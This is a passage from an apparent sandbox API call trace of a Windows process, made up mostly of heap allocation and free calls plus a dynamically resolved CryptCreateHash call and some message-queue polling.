hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0206.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0206.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0206.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0206.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.617] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0206.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0206.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0206.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0206.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0206.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0206.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0206.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0206.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0206.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0206.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0206.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0206.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0206.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0206.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0206.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0206.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0206.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x24a9fa8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0206.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.621] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0206.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0206.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0206.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0206.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0206.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0206.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0206.622] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0206.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0206.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0206.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0206.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0206.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0206.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0206.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0206.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0206.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0206.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0206.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0206.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0206.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0206.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0206.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0206.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0206.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0206.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0206.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0206.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0206.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0206.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0206.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0206.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0206.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0206.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0206.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0206.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0206.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0206.626] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0206.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0206.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0206.627] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0206.627] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0206.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0206.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.628] 